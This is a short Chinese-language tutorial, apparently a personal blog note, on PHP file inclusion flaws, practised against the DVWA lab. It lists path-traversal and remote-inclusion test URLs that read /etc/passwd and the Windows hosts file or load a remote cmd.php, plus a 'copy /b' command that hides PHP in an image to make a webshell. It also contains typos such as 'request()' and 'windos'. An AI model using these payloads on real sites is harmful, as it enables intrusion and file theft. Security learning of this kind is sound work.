- A+
文件包含漏洞
文件包含
把重复使用的函数写入到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编码。
为了让代码更灵活,将包含的文件设置为变量,用来进行动态调用。
文件包含漏洞测试步骤:
1.查找漏洞:http://xxx/index.php?page=aaa.php
2.通过修改URL参数内容提交测试代码,判断是否存在漏洞
如:
1 2 3 4 5 |
http://xxx/index.php?page=../../etc/passwd http://xxx/index.php?page=c:\windos\system32\drivers\etc\hosts http://xxx/index.php?page=http://xxx/cmd.php |
文件包含函数
include():执行到include是才包含文件,找不到被包含时会提示警告,担脚本将继续执行。
request():只要程序一运行就包含文件,找不到被包含的文件是会产生严重错误,并停止脚本。
文件包含漏洞-本地读取
1 2 3 4 5 |
http://192.168.238.153/dvwa/vulnerabilities/fi/?page=file1.php http://192.168.238.153/dvwa/vulnerabilities/fi/?page=c:\windos\system32\drivers\etc\hosts http://192.168.238.153/dvwa/vulnerabilities/fi/?page=file://c:\windos\system32\drivers\etc\hosts |
远程包含文件
php.ini配置文件
allow_url_fopen on //默认打开
allow_url_include on //默认关闭
magic_quotes_gpc off //默认关闭
1 |
http://192.168.238.153/dvwa/vulnerabilities/fi/?page=http://192.168.238.135/info.txt |
文件包含漏洞-结合文件上传
漏洞利用:
1.生成图片木马:copy /b 1.jpg +1.php new1.jpg
2.在存在文件包含的漏洞,对图片木马包含解析
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫